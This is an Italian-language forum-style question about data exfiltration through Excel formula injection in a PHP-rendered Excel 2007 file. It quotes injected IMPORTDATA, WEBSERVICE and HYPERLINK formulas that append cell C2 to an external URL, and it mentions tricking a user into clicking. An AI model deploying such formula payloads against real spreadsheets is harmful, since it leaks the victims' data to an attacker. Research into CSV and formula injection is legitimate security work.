Ho bisogno di estrarre i dati da una fille di Excel usando le funzioni di Excel 2007.
Il concetto è in qualche modo correlato al tipo di estrazione dei dati XSS memorizzato, solo che ho bisogno di utilizzare le funzioni di Excel 2007 (che sono riuscito a iniettare nelle celle del file) per fare in modo che l'utente carichi automaticamente un'immagine, un percorso web o faccia una richiesta DNS.
Fino ad ora ho provato i seguenti, ma non sono riusciti perché il file Excel è reso in PHP con le funzioni di Excel 2007:
-
=IMPORTDATA(CONCATENATE("https://example.com/", C2))
-
=WEBSERVICE(CONCATENATE("https://example.com/", C2))
Ho iniettato con successo:
-
=HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")
Ma in questo modo devo ingannare un utente per aprire il link da solo (non impossibile, ma non divertente: D).